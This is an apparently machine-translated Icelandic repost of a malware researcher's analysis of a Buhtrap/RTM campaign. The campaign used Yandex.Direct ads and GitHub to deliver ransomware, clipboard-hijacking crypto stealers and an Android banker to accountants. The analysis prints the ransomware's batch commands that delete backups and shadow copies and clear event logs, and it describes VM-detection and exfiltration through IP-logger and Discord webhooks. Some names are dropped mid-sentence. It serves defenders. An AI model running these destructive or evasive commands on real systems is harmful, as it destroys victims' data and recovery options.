Til að miða við endurskoðendur í netárás geturðu notað vinnuskjöl sem þeir leita að á netinu. Þetta er nokkurn veginn það sem nethópur hefur verið að gera undanfarna mánuði, dreift þekktum bakdyrum. и , auk dulkóðunar og hugbúnaðar til að stela dulritunargjaldmiðlum. Flest skotmörk eru staðsett í Rússlandi. Árásin var gerð með því að setja illgjarn auglýsingar á Yandex.Direct. Mögulegum fórnarlömbum var vísað á vefsíðu þar sem þeir voru beðnir um að hlaða niður illgjarnri skrá sem dulbúið var sem skjalasniðmát. Yandex fjarlægði illgjarn auglýsingar eftir viðvörun okkar.
Buhtrap frumkóðanum hefur verið lekið á netinu áður svo hver sem er getur notað hann. Við höfum engar upplýsingar um framboð á RTM kóða.
Í þessari færslu munum við segja þér hvernig árásarmennirnir dreifðu spilliforritum með Yandex.Direct og hýstu það á GitHub. Færslunni lýkur með tæknilegri greiningu á spilliforritinu.
Buhtrap og RTM eru aftur í viðskiptum
Útbreiðsla og fórnarlömb
Hinar ýmsu farmar sem afhentar eru fórnarlömbum deila sameiginlegu útbreiðslukerfi. Allar skaðlegar skrár búnar til af árásarmönnum voru settar í tvær mismunandi GitHub geymslur.
Venjulega innihélt geymslan eina illgjarna skrá sem hægt var að hlaða niður, sem breyttist oft. Þar sem GitHub gerir þér kleift að skoða sögu breytinga á geymslu, getum við séð hvaða spilliforritum var dreift á ákveðnu tímabili. Til að sannfæra fórnarlambið um að hlaða niður illgjarnri skrá var vefsíðan blanki-shabloni24[.]ru, sem sýnd er á myndinni hér að ofan, notuð.
Hönnun síðunnar og öll nöfn illgjarnra skráa fylgja einu hugtaki - eyðublöðum, sniðmátum, samningum, sýnishornum osfrv. Með hliðsjón af því að Buhtrap og RTM hugbúnaður hefur þegar verið notaður í árásum á endurskoðendur áður, gerðum við ráð fyrir að stefnan í nýju herferðinni er sú sama. Eina spurningin er hvernig fórnarlambið komst á síðu árásarmannanna.
Sýking
Að minnsta kosti nokkur hugsanleg fórnarlömb sem enduðu á þessari síðu laðast að illgjarnum auglýsingum. Hér að neðan er dæmi um vefslóð:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Eins og þú sérð á hlekknum var borðinn settur á lögmætan bókhaldsvettvang bb.f2[.]kz. Það er mikilvægt að hafa í huga að borðarnir birtust á mismunandi síðum, allir voru með sama herferðaauðkenni (blanki_rsya) og tengdust flestir bókhaldi eða lögfræðiaðstoð. Vefslóðin sýnir að hugsanlega fórnarlambið notaði beiðnina „niðurhala reikningsformi“ sem styður tilgátu okkar um markvissar árásir. Hér að neðan eru síðurnar þar sem borðarnir birtust og samsvarandi leitarfyrirspurnir.
- hlaða niður reikningsformi – bb.f2[.]kz
- sýnishorn samningur - Ipopen[.]ru
- umsókn kvörtunarsýni - 77metrov[.]ru
- samningsform - blank-dogovor-kupli-prodazhi[.]ru
- sýnishorn dómskröfu - zen.yandex[.]ru
- sýnishorn af kvörtun - yurday[.]ru
- sýnishorn samningsforma – Regforum[.]ru
- samningsform – assistentus[.]ru
- sýnishorn íbúðasamnings – napravah[.]com
- sýnishorn af löglegum samningum - avito[.]ru
Blanki-shabloni24[.]ru vefsvæðið gæti hafa verið stillt til að standast einfalt sjónrænt mat. Venjulega virðist auglýsing sem vísar á fagmannlega útlitssíðu með tengli á GitHub ekki vera eitthvað augljóslega slæmt. Að auki hlóðu árásarmennirnir upp skaðlegum skrám í geymsluna aðeins í takmarkaðan tíma, líklega meðan á herferðinni stóð. Oftast innihélt GitHub geymslan tómt zip skjalasafn eða auða EXE skrá. Þannig gátu árásarmenn dreift auglýsingum í gegnum Yandex.Direct á vefsvæðum sem líklegast voru heimsótt af endurskoðendum sem komu til að svara tilteknum leitarfyrirspurnum.
Næst skulum við skoða hina ýmsu farma sem dreift er á þennan hátt.
Greining á farmi
Tímafræði dreifingar
Illgjarn herferð hófst í lok október 2018 og er virk þegar þetta er skrifað. Þar sem öll geymslan var aðgengileg almenningi á GitHub tókum við saman nákvæma tímalínu yfir dreifingu sex mismunandi spilliforritafjölskyldna (sjá mynd hér að neðan). Við höfum bætt við línu sem sýnir hvenær borðatengillinn uppgötvaðist, mældur með ESET fjarmælingum, til samanburðar við git sögu. Eins og þú sérð er þetta í góðu samræmi við framboð á farmálagi á GitHub. Ósamræmið í lok febrúar má skýra með því að við vorum ekki með hluta af breytingasögunni vegna þess að geymslan var fjarlægð úr GitHub áður en við gátum fengið hana að fullu.
Mynd 1. Tímafræði dreifingar spilliforrita.
Kóða undirritunarskírteini
Í herferðinni voru notuð mörg vottorð. Sum voru undirrituð af fleiri en einni malwarefjölskyldu, sem bendir ennfremur til þess að mismunandi sýni tilheyrðu sömu herferð. Þrátt fyrir að einkalykillinn væri tiltækur undirrituðu rekstraraðilar ekki kerfisbundið tvöfaldana og notuðu ekki lykilinn fyrir öll sýni. Seint í febrúar 2019 byrjuðu árásarmenn að búa til ógildar undirskriftir með því að nota vottorð í eigu Google sem þeir höfðu ekki einkalykilinn fyrir.
Öll vottorð sem taka þátt í herferðinni og spilliforritafjölskyldur sem þeir skrifa undir eru skráð í töflunni hér að neðan.
Við höfum líka notað þessi kóða undirritunarvottorð til að koma á tengslum við aðrar fjölskyldur spilliforrita. Fyrir flest vottorð fundum við ekki sýni sem ekki var dreift í gegnum GitHub geymslu. Hins vegar var TOV „MARIYA“ vottorðið notað til að undirrita spilliforrit sem tilheyrir botnetinu , auglýsingaforrit og námuverkamenn. Það er ólíklegt að þessi spilliforrit tengist þessari herferð. Líklega var skírteinið keypt á darknetinu.
Win32/Filecoder.Buhtrap
Fyrsti þátturinn sem vakti athygli okkar var nýuppgötvaði Win32/Filecoder.Buhtrap. Þetta er Delphi tvöfaldur skrá sem er stundum pakkað. Það var aðallega dreift í febrúar–mars 2019. Það hagar sér eins og það sæmir lausnarhugbúnaðarforriti - það leitar á staðbundnum drifum og netmöppum og dulkóðar skrárnar sem það finnur. Það þarf ekki nettengingu til að vera í hættu vegna þess að það hefur ekki samband við netþjóninn til að senda dulkóðunarlykla. Þess í stað bætir það „tákn“ við lok lausnargjaldsskilaboðanna og stingur upp á því að nota tölvupóst eða Bitmessage til að hafa samband við rekstraraðila.
Til að dulkóða eins margar viðkvæmar auðlindir og mögulegt er, keyrir Filecoder.Buhtrap þráð sem er hannaður til að loka lykilhugbúnaði sem gæti haft opna skráameðferðaraðila sem innihalda verðmætar upplýsingar sem gætu truflað dulkóðun. Markferlar eru aðallega gagnagrunnsstjórnunarkerfi (DBMS). Að auki eyðir Filecoder.Buhtrap annálaskrám og afritum til að gera endurheimt gagna erfið. Til að gera þetta skaltu keyra hópforskriftina hér að neðan.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap notar lögmæta IP Logger þjónustu á netinu sem er hönnuð til að safna upplýsingum um gesti á vefsíðunni. Þetta er ætlað að rekja fórnarlömb lausnarhugbúnaðarins, sem er á ábyrgð skipanalínunnar:
mshta.exe "javascript:document.write('');"
Skrár fyrir dulkóðun eru valdar ef þær passa ekki við þrjá útilokunarlista. Í fyrsta lagi eru skrár með eftirfarandi endingum ekki dulkóðaðar: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys og .kylfu. Í öðru lagi eru allar skrár þar sem öll slóðin inniheldur skráarstrengi af listanum hér að neðan útilokaðar.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Í þriðja lagi eru ákveðin skráarnöfn einnig útilokuð frá dulkóðun, þar á meðal skráarnafn lausnargjaldsskilaboðanna. Listinn er sýndur hér að neðan. Augljóslega er öllum þessum undantekningum ætlað að halda vélinni gangandi, en með lágmarks aksturshæfni.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Dulkóðunarkerfi skráa
Þegar spilliforritið hefur verið keyrt myndar það 512 bita RSA lyklapar. Einkaveldi (d) og stuðull (n) eru síðan dulkóðuð með harðkóða 2048 bita opinberum lykli (opinber veldisvísir og stuðull), zlib-pakkaður og base64 dulkóðaður. Kóðinn sem ber ábyrgð á þessu er sýndur á mynd 2.
Mynd 2. Niðurstaða Hex-Rays afsamsetningar á 512 bita RSA lyklaparsmyndunarferli.
Hér að neðan er dæmi um venjulegan texta með mynduðum einkalykli, sem er tákn sem fylgir lausnargjaldsskilaboðunum.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Opinber lykill árásarmannanna er gefinn upp hér að neðan.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Skrárnar eru dulkóðaðar með AES-128-CBC með 256 bita lykli. Fyrir hverja dulkóðaða skrá myndast nýr lykill og nýr upphafsvektor. Lykilupplýsingunum er bætt við lok dulkóðuðu skráarinnar. Við skulum íhuga sniðið á dulkóðuðu skránni.
Dulkóðaðar skrár hafa eftirfarandi haus:
Upprunaskráargögnin að viðbættum VEGA töfragildinu eru dulkóðuð í fyrstu 0x5000 bætin. Allar afkóðunarupplýsingar eru festar við skrá með eftirfarandi uppbyggingu:
- Skráarstærðarmerkið inniheldur merki sem gefur til kynna hvort skráin sé stærri en 0x5000 bæti að stærð
— AES key blob = ZlibCompress(RSAencrypt(AES lykill + IV, opinber lykill af mynduðu RSA lyklaparinu))
- RSA lyklablabba = ZlibCompress(RSAEncrypt (myndaður RSA einkalykill, harðkóði RSA opinber lykill))
Win32/ClipBanker
Win32/ClipBanker er hluti sem var dreift með hléum frá lok október til byrjun desember 2018. Hlutverk þess er að fylgjast með innihaldi klemmuspjaldsins, það leitar að heimilisföngum veskis cryptocurrency. Eftir að hafa ákvarðað heimilisfang veskisins, skiptir ClipBanker því út fyrir heimilisfang sem talið er tilheyra rekstraraðilum. Sýnin sem við skoðuðum voru hvorki í kassa né hylja. Eina aðferðin sem notuð er til að fela hegðun er dulkóðun strengja. Netföng símafyrirtækis eru dulkóðuð með RC4. Markmið dulritunargjaldmiðla eru Bitcoin, Bitcoin reiðufé, Dogecoin, Ethereum og Ripple.
Á tímabilinu sem spilliforritið dreifðist í Bitcoin veski árásarmannanna var lítið magn sent til VTS, sem vekur efasemdir um árangur herferðarinnar. Að auki eru engar vísbendingar sem benda til þess að þessi viðskipti hafi verið tengd ClipBanker yfirleitt.
Win32/RTM
Win32/RTM hlutnum var dreift í nokkra daga í byrjun mars 2019. RTM er tróverskur bankastjóri skrifaður í Delphi, sem miðar að ytri bankakerfum. Árið 2017 birtu ESET vísindamenn þessa forrits á lýsingin enn við. Í janúar 2019 gaf Palo Alto Networks einnig út .
Buhtrap Loader
Í nokkurn tíma var niðurhalartæki fáanlegt á GitHub sem var ekki svipað og fyrri Buhtrap verkfæri. Hann snýr sér að https://94.100.18[.]67/RSS.php?<some_id> til að fá næsta stig og hleður því beint inn í minnið. Hægt er að greina á milli tveggja hegðunar annars stigs kóðans. Í fyrstu slóðinni fór RSS.php framhjá Buhtrap bakdyrunum beint - þessi bakdyr er mjög svipuð þeirri sem var tiltæk eftir að frumkóðanum var lekið.
Athyglisvert er að við sjáum nokkrar herferðir með Buhtrap bakdyrunum og þær eru að sögn reknar af mismunandi rekstraraðilum. Í þessu tilfelli er aðalmunurinn sá að bakdyrnar eru hlaðnar beint inn í minni og notar ekki venjulega kerfið með DLL dreifingarferlinu sem við ræddum um . Að auki breyttu rekstraraðilar RC4 lyklinum sem notaður var til að dulkóða netumferð á C&C netþjóninn. Í flestum herferðunum sem við höfum séð nenntu símafyrirtækin ekki að breyta þessum lykli.
Önnur, flóknari hegðunin var sú að RSS.php vefslóðin var send til annars hleðslutækis. Það útfærði einhverja óskýringu, svo sem að endurbyggja kraftmikla innflutningstöfluna. Tilgangur ræsiforritsins er að hafa samband við C&C þjóninn [.]com/api/F27F84EDA4D13B15/2, sendu logs og bíddu eftir svari. Það vinnur viðbrögðin sem blobba, hleður því inn í minnið og framkvæmir það. Burðargetan sem við sáum framkvæma þessa hleðslutæki var sama Buhtrap bakdyrnar, en það geta verið aðrir íhlutir.
Android/Spy.Banker
Athyglisvert er að hluti fyrir Android fannst einnig í GitHub geymslunni. Hann var í aðalútibúinu í aðeins einn dag - 1. nóvember 2018. Fyrir utan að vera birt á GitHub, finnur ESET fjarmæling engar vísbendingar um að þessu spilliforriti sé dreift.
Íhluturinn var hýstur sem Android forritapakki (APK). Það er mjög ruglað. Illgjarn hegðun er falin í dulkóðuðu JAR sem staðsett er í APK. Það er dulkóðað með RC4 með þessum lykli:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Sami lykill og reiknirit eru notaðir til að dulkóða strengi. JAR er staðsett í APK_ROOT + image/files. Fyrstu 4 bæti skráarinnar innihalda lengd dulkóðaða JAR, sem byrjar strax á eftir lengdareitnum.
Eftir að hafa afkóðað skrána komumst við að því að þetta var Anubis - áður bankastjóri fyrir Android. Spilliforritið hefur eftirfarandi eiginleika:
- hljóðnema upptöku
- taka skjámyndir
- að fá GPS hnit
- keylogger
- dulkóðun tækisgagna og eftirspurn eftir lausnargjaldi
- ruslpóstur
Athyglisvert er að bankastjórinn notaði Twitter sem varasamskiptarás til að fá annan C&C netþjón. Sýnið sem við greindum notaði @JonesTrader reikninginn, en þegar greiningin var gerð var honum þegar lokað.
Bankastjórinn inniheldur lista yfir markforrit á Android tækinu. Það er lengri en listinn sem fékkst í Sophos rannsókninni. Listinn inniheldur mörg bankaforrit, netverslunarforrit eins og Amazon og eBay og dulritunargjaldeyrisþjónustur.
MSIL/ClipBanker.IH
Síðasti íhluturinn sem var dreift sem hluti af þessari herferð var .NET Windows executable, sem birtist í mars 2019. Flestar útgáfurnar sem rannsakaðar voru voru pakkaðar með ConfuserEx v1.0.0. Eins og ClipBanker notar þessi hluti klemmuspjaldið. Markmið hans er fjölbreytt úrval dulritunargjaldmiðla, auk tilboða á Steam. Að auki notar hann IP Logger þjónustuna til að stela Bitcoin einka WIF lyklinum.
Verndarkerfi
Til viðbótar við ávinninginn sem ConfuserEx veitir við að koma í veg fyrir villuleit, undirboð og átt við, inniheldur íhluturinn getu til að greina vírusvarnarvörur og sýndarvélar.
Til að staðfesta að það keyri í sýndarvél notar spilliforritið innbyggðu Windows WMI skipanalínuna (WMIC) til að biðja um BIOS upplýsingar, þ.e.
wmic bios
Síðan greinir forritið skipanaúttakið og leitar að leitarorðum: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Til að greina vírusvarnarvörur sendir spilliforrit beiðni um Windows Management Instrumentation (WMI) til Windows öryggismiðstöðvar með því að nota ManagementObjectSearcher API eins og sýnt er hér að neðan. Eftir afkóðun frá base64 lítur símtalið svona út:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Mynd 3. Aðferð til að bera kennsl á vírusvarnarvörur.
Að auki athugar spilliforritið hvort , tól til að vernda gegn árásum á klemmuspjald og, ef það er í gangi, stöðvar alla þræði í því ferli og gerir þar með vörnina óvirka.
Þrautseigju
Útgáfan af spilliforritum sem við rannsökuðum afritar sig í %APPDATA%googleupdater.exe og stillir „falinn“ eiginleikann fyrir google möppuna. Þá breytir hún gildinu SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell í Windows skrásetningunni og bætir við slóðinni updater.exe. Þannig verður spilliforritið keyrt í hvert skipti sem notandinn skráir sig inn.
Illgjarn hegðun
Eins og ClipBanker, fylgist spilliforritið með innihaldi klemmuspjaldsins og leitar að vistföngum dulritunargjaldmiðils veskis, og þegar það finnst kemur það í staðinn fyrir eitt af heimilisföngum símafyrirtækisins. Hér að neðan er listi yfir netföng miðað við það sem er að finna í kóðanum.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Fyrir hverja tegund heimilisfangs er samsvarandi regluleg tjáning. STEAM_URL gildið er notað til að ráðast á Steam kerfið, eins og sjá má af reglulegri tjáningu sem er notuð til að skilgreina í biðminni:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Útflæðisrás
Auk þess að skipta um vistföng í biðminni miðar spilliforritið á einka WIF lykla Bitcoin, Bitcoin Core og Electrum Bitcoin veski. Forritið notar plogger.org sem útrásarrás til að fá WIF einkalykilinn. Til að gera þetta bæta rekstraraðilar einkalykilsgögnum við HTTP haus notanda umboðsmanns, eins og sýnt er hér að neðan.
Mynd 4. IP Logger stjórnborð með úttaksgögnum.
Rekstraraðilar notuðu ekki iplogger.org til að útrýma veskjum. Líklega hafa þeir gripið til annarrar aðferðar vegna 255 stafatakmarkanna í reitnum User-Agentbirtist í IP Logger vefviðmótinu. Í sýnunum sem við rannsökuðum var hinn úttaksþjónninn geymdur í umhverfisbreytunni DiscordWebHook. Það kemur á óvart að þessari umhverfisbreytu er hvergi úthlutað í kóðanum. Þetta bendir til þess að spilliforritið sé enn í þróun og breytan er úthlutað á prófunarvél rekstraraðilans.
Það er annað merki um að forritið sé í þróun. Tvöfaldur skráin inniheldur tvær iplogger.org vefslóðir og báðar eru fyrirspurnir þegar gögn eru fjarlægð. Í beiðni um eina af þessum vefslóðum er gildið í Referer reitnum á undan „DEV /“. Við fundum líka útgáfu sem var ekki pakkað með ConfuserEx, viðtakandi þessarar vefslóðar heitir DevFeedbackUrl. Byggt á heiti umhverfisbreytunnar teljum við að rekstraraðilarnir ætli að nota lögmætu þjónustuna Discord og vefhlerunarkerfi þess til að stela dulritunarveski.
Ályktun
Þessi herferð er dæmi um notkun lögmætrar auglýsingaþjónustu við netárásir. Áætlunin beinist að rússneskum samtökum, en það kæmi okkur ekki á óvart að sjá slíka árás með því að nota ekki rússneska þjónustu. Til að forðast málamiðlanir verða notendur að vera öruggir um orðspor uppruna hugbúnaðarins sem þeir hlaða niður.
Heildarlisti yfir vísbendingar um málamiðlun og MITER ATT&CK eiginleika er fáanlegur á .
Heimild: www.habr.com